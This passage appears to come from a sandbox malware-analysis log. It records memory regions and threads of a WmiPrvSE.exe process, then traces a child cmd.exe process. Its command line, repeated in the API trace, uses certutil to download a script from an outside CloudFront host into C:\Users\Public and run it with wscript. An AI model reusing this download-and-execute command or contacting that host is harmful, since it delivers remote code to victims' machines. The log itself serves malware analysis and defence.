end_va = 0x894200fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000894080000"
filename = ""
Region:
id = 852
start_va = 0x894210000
end_va = 0x8942cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000894210000"
filename = ""
Region:
id = 853
start_va = 0x8942d0000
end_va = 0x89434ffff
entry_point = 0x0
region_type = private
name = "private_0x00000008942d0000"
filename = ""
Region:
id = 854
start_va = 0x894350000
end_va = 0x89444ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000894350000"
filename = ""
Region:
id = 855
start_va = 0x894450000
end_va = 0x8944cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000894450000"
filename = ""
Region:
id = 856
start_va = 0x8944d0000
end_va = 0x89454ffff
entry_point = 0x0
region_type = private
name = "private_0x00000008944d0000"
filename = ""
Region:
id = 857
start_va = 0x894550000
end_va = 0x8945cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000894550000"
filename = ""
Region:
id = 858
start_va = 0x8945d0000
end_va = 0x89464ffff
entry_point = 0x0
region_type = private
name = "private_0x00000008945d0000"
filename = ""
Region:
id = 859
start_va = 0x7df5ffb20000
end_va = 0x7ff5ffb1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffb20000"
filename = ""
Region:
id = 860
start_va = 0x7ff7b9b5c000
end_va = 0x7ff7b9b5dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b9b5c000"
filename = ""
Region:
id = 861
start_va = 0x7ff7b9b5e000
end_va = 0x7ff7b9b5ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b9b5e000"
filename = ""
Region:
id = 862
start_va = 0x7ff7b9b60000
end_va = 0x7ff7b9c5ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff7b9b60000"
filename = ""
Region:
id = 863
start_va = 0x7ff7b9c60000
end_va = 0x7ff7b9c82fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff7b9c60000"
filename = ""
Region:
id = 864
start_va = 0x7ff7b9c84000
end_va = 0x7ff7b9c85fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b9c84000"
filename = ""
Region:
id = 865
start_va = 0x7ff7b9c86000
end_va = 0x7ff7b9c86fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b9c86000"
filename = ""
Region:
id = 866
start_va = 0x7ff7b9c88000
end_va = 0x7ff7b9c89fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b9c88000"
filename = ""
Region:
id = 867
start_va = 0x7ff7b9c8a000
end_va = 0x7ff7b9c8bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b9c8a000"
filename = ""
Region:
id = 868
start_va = 0x7ff7b9c8e000
end_va = 0x7ff7b9c8ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b9c8e000"
filename = ""
Region:
id = 869
start_va = 0x7ff7ba0c0000
end_va = 0x7ff7ba13efff
entry_point = 0x7ff7ba0c0000
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 870
start_va = 0x7ffb25560000
end_va = 0x7ffb2572dfff
entry_point = 0x7ffb25560000
region_type = mapped_file
name = "cimwin32.dll"
filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")
Region:
id = 871
start_va = 0x7ffb25de0000
end_va = 0x7ffb25e2dfff
entry_point = 0x7ffb25de0000
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 872
start_va = 0x7ffb2d450000
end_va = 0x7ffb2d465fff
entry_point = 0x7ffb2d450000
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 873
start_va = 0x7ffb2d700000
end_va = 0x7ffb2d724fff
entry_point = 0x7ffb2d700000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 874
start_va = 0x7ffb2d730000
end_va = 0x7ffb2d743fff
entry_point = 0x7ffb2d730000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 875
start_va = 0x7ffb2d750000
end_va = 0x7ffb2d847fff
entry_point = 0x7ffb2d750000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 876
start_va = 0x7ffb2e4a0000
end_va = 0x7ffb2e4b0fff
entry_point = 0x7ffb2e4a0000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 877
start_va = 0x7ffb33330000
end_va = 0x7ffb333aefff
entry_point = 0x7ffb33330000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 878
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 879
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 880
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 881
start_va = 0x7ffb39960000
end_va = 0x7ffb3998bfff
entry_point = 0x7ffb39960000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 882
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 883
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 884
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 885
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 886
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 887
start_va = 0x7ffb3a9e0000
end_va = 0x7ffb3a9e7fff
entry_point = 0x7ffb3a9e0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 888
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 889
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 890
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 891
start_va = 0x7ffb3c570000
end_va = 0x7ffb3c5d8fff
entry_point = 0x7ffb3c570000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 892
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 893
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 894
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 895
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 896
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 897
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 898
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 899
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 900
start_va = 0x893970000
end_va = 0x893971fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000893970000"
filename = ""
Region:
id = 901
start_va = 0x894650000
end_va = 0x8946cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000894650000"
filename = ""
Region:
id = 902
start_va = 0x7ff7b9c8c000
end_va = 0x7ff7b9c8dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b9c8c000"
filename = ""
Region:
id = 903
start_va = 0x7ffb39350000
end_va = 0x7ffb3936efff
entry_point = 0x7ffb39350000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 904
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Thread:
id = 80
os_tid = 0xb58
Thread:
id = 81
os_tid = 0xb30
Thread:
id = 82
os_tid = 0x37c
Thread:
id = 83
os_tid = 0xa98
Thread:
id = 84
os_tid = 0xabc
Thread:
id = 85
os_tid = 0x7fc
Thread:
id = 86
os_tid = 0x564
Thread:
id = 89
os_tid = 0x8a4
Thread:
id = 91
os_tid = 0xc58
Process:
id = "4"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x22b6a000"
os_pid = "0xc40"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0xae8"
cmd_line = "cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js && wscript.exe C:\\Users\\Public\\en-US.js"
cur_dir = "C:\\Windows\\system32\\"
os_username = "LHNIWSJ\\CIiHmnxMn6Ps"
os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 905
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 906
start_va = 0x4e96db0000
end_va = 0x4e96dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000004e96db0000"
filename = ""
Region:
id = 907
start_va = 0x4e96dd0000
end_va = 0x4e96de3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004e96dd0000"
filename = ""
Region:
id = 908
start_va = 0x4e96df0000
end_va = 0x4e96eeffff
entry_point = 0x0
region_type = private
name = "private_0x0000004e96df0000"
filename = ""
Region:
id = 909
start_va = 0x4e96ef0000
end_va = 0x4e96ef3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004e96ef0000"
filename = ""
Region:
id = 910
start_va = 0x4e96f00000
end_va = 0x4e96f00fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004e96f00000"
filename = ""
Region:
id = 911
start_va = 0x4e96f10000
end_va = 0x4e96f11fff
entry_point = 0x0
region_type = private
name = "private_0x0000004e96f10000"
filename = ""
Region:
id = 912
start_va = 0x7df5ff750000
end_va = 0x7ff5ff74ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ff750000"
filename = ""
Region:
id = 913
start_va = 0x7ff78fb70000
end_va = 0x7ff78fb92fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff78fb70000"
filename = ""
Region:
id = 914
start_va = 0x7ff78fb9d000
end_va = 0x7ff78fb9efff
entry_point = 0x0
region_type = private
name = "private_0x00007ff78fb9d000"
filename = ""
Region:
id = 915
start_va = 0x7ff78fb9f000
end_va = 0x7ff78fb9ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff78fb9f000"
filename = ""
Region:
id = 916
start_va = 0x7ff7906e0000
end_va = 0x7ff790738fff
entry_point = 0x7ff7906e0000
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 917
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 919
start_va = 0x4e96db0000
end_va = 0x4e96dbffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004e96db0000"
filename = ""
Region:
id = 920
start_va = 0x4e96f20000
end_va = 0x4e96fddfff
entry_point = 0x4e96f20000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 921
start_va = 0x4e970f0000
end_va = 0x4e971effff
entry_point = 0x0
region_type = private
name = "private_0x0000004e970f0000"
filename = ""
Region:
id = 922
start_va = 0x7ff78fa70000
end_va = 0x7ff78fb6ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff78fa70000"
filename = ""
Region:
id = 923
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 924
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 996
start_va = 0x4e96dc0000
end_va = 0x4e96dc6fff
entry_point = 0x0
region_type = private
name = "private_0x0000004e96dc0000"
filename = ""
Region:
id = 997
start_va = 0x4e96fe0000
end_va = 0x4e970dffff
entry_point = 0x0
region_type = private
name = "private_0x0000004e96fe0000"
filename = ""
Region:
id = 998
start_va = 0x4e973b0000
end_va = 0x4e973bffff
entry_point = 0x0
region_type = private
name = "private_0x0000004e973b0000"
filename = ""
Region:
id = 999
start_va = 0x7ff78fb9b000
end_va = 0x7ff78fb9cfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff78fb9b000"
filename = ""
Region:
id = 1000
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1005
start_va = 0x4e970e0000
end_va = 0x4e970e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000004e970e0000"
filename = ""
Region:
id = 1006
start_va = 0x4e973c0000
end_va = 0x4e976f6fff
entry_point = 0x4e973c0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 90
os_tid = 0xc44
[0041.139] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7906e0000
[0041.139] __set_app_type (_Type=0x1)
[0041.139] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7906f44a0) returned 0x0
[0041.139] __getmainargs (in: _Argc=0x7ff79070f0e8, _Argv=0x7ff79070f0f0, _Env=0x7ff79070f0f8, _DoWildCard=0, _StartInfo=0x7ff79070f104 | out: _Argc=0x7ff79070f0e8, _Argv=0x7ff79070f0f0, _Env=0x7ff79070f0f8) returned 0
[0041.139] GetCurrentThreadId () returned 0xc44
[0041.139] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc44) returned 0x6c
[0041.139] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffb3d260000
[0041.139] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="SetThreadUILanguage") returned 0x7ffb3d27d550
[0041.139] SetThreadUILanguage (LangId=0x0) returned 0x409
[0041.143] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0041.143] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4e96eef708 | out: phkResult=0x4e96eef708*=0x0) returned 0x2
[0041.143] VirtualQuery (in: lpAddress=0x4e96eef6f4, lpBuffer=0x4e96eef670, dwLength=0x30 | out: lpBuffer=0x4e96eef670*(BaseAddress=0x4e96eef000, AllocationBase=0x4e96df0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30
[0041.143] VirtualQuery (in: lpAddress=0x4e96df0000, lpBuffer=0x4e96eef670, dwLength=0x30 | out: lpBuffer=0x4e96eef670*(BaseAddress=0x4e96df0000, AllocationBase=0x4e96df0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffffd000)) returned 0x30
[0041.143] VirtualQuery (in: lpAddress=0x4e96df1000, lpBuffer=0x4e96eef670, dwLength=0x30 | out: lpBuffer=0x4e96eef670*(BaseAddress=0x4e96df1000, AllocationBase=0x4e96df0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffffd000)) returned 0x30
[0041.143] VirtualQuery (in: lpAddress=0x4e96df4000, lpBuffer=0x4e96eef670, dwLength=0x30 | out: lpBuffer=0x4e96eef670*(BaseAddress=0x4e96df4000, AllocationBase=0x4e96df0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30
[0041.143] VirtualQuery (in: lpAddress=0x4e96ef0000, lpBuffer=0x4e96eef670, dwLength=0x30 | out: lpBuffer=0x4e96eef670*(BaseAddress=0x4e96ef0000, AllocationBase=0x4e96ef0000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0xffffd000)) returned 0x30
[0041.143] GetConsoleOutputCP () returned 0x1b5
[0041.146] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff790718640 | out: lpCPInfo=0x7ff790718640) returned 1
[0041.146] SetConsoleCtrlHandler (HandlerRoutine=0x7ff7907015d0, Add=1) returned 1
[0041.146] _get_osfhandle (_FileHandle=1) returned 0x24
[0041.146] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1
[0041.149] _get_osfhandle (_FileHandle=1) returned 0x24
[0041.149] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7907185ec | out: lpMode=0x7ff7907185ec) returned 1
[0041.152] _get_osfhandle (_FileHandle=1) returned 0x24
[0041.152] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1
[0041.199] _get_osfhandle (_FileHandle=0) returned 0x20
[0041.199] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7907185e8 | out: lpMode=0x7ff7907185e8) returned 1
[0041.207] _get_osfhandle (_FileHandle=0) returned 0x20
[0041.207] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1
[0041.209] GetEnvironmentStringsW () returned 0x4e970f5690*
[0041.209] FreeEnvironmentStringsA (penv="A") returned 1
[0041.209] GetEnvironmentStringsW () returned 0x4e970f5690*
[0041.209] FreeEnvironmentStringsA (penv="A") returned 1
[0041.209] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4e96eee5b8 | out: phkResult=0x4e96eee5b8*=0x78) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x0, lpData=0x4e96eee5d0*=0x1, lpcbData=0x4e96eee5b4*=0x1000) returned 0x2
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x4, lpData=0x4e96eee5d0*=0x1, lpcbData=0x4e96eee5b4*=0x4) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x0, lpData=0x4e96eee5d0*=0x1, lpcbData=0x4e96eee5b4*=0x1000) returned 0x2
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x4, lpData=0x4e96eee5d0*=0x0, lpcbData=0x4e96eee5b4*=0x4) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x4, lpData=0x4e96eee5d0*=0x40, lpcbData=0x4e96eee5b4*=0x4) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x4, lpData=0x4e96eee5d0*=0x40, lpcbData=0x4e96eee5b4*=0x4) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x0, lpData=0x4e96eee5d0*=0x40, lpcbData=0x4e96eee5b4*=0x1000) returned 0x2
[0041.209] RegCloseKey (hKey=0x78) returned 0x0
[0041.209] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4e96eee5b8 | out: phkResult=0x4e96eee5b8*=0x78) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x0, lpData=0x4e96eee5d0*=0x40, lpcbData=0x4e96eee5b4*=0x1000) returned 0x2
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x4, lpData=0x4e96eee5d0*=0x1, lpcbData=0x4e96eee5b4*=0x4) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x0, lpData=0x4e96eee5d0*=0x1, lpcbData=0x4e96eee5b4*=0x1000) returned 0x2
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x4, lpData=0x4e96eee5d0*=0x0, lpcbData=0x4e96eee5b4*=0x4) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x4, lpData=0x4e96eee5d0*=0x9, lpcbData=0x4e96eee5b4*=0x4) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x4, lpData=0x4e96eee5d0*=0x9, lpcbData=0x4e96eee5b4*=0x4) returned 0x0
[0041.209] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4e96eee5b0, lpData=0x4e96eee5d0, lpcbData=0x4e96eee5b4*=0x1000 | out: lpType=0x4e96eee5b0*=0x0, lpData=0x4e96eee5d0*=0x9, lpcbData=0x4e96eee5b4*=0x1000) returned 0x2
[0041.209] RegCloseKey (hKey=0x78) returned 0x0
[0041.210] time (in: timer=0x0 | out: timer=0x0) returned 0x5a85d185
[0041.210] srand (_Seed=0x5a85d185)
[0041.210] GetCommandLineW () returned="cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js && wscript.exe C:\\Users\\Public\\en-US.js"
[0041.210] GetCommandLineW () returned="cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js && wscript.exe C:\\Users\\Public\\en-US.js"
[0041.210] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff790720920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
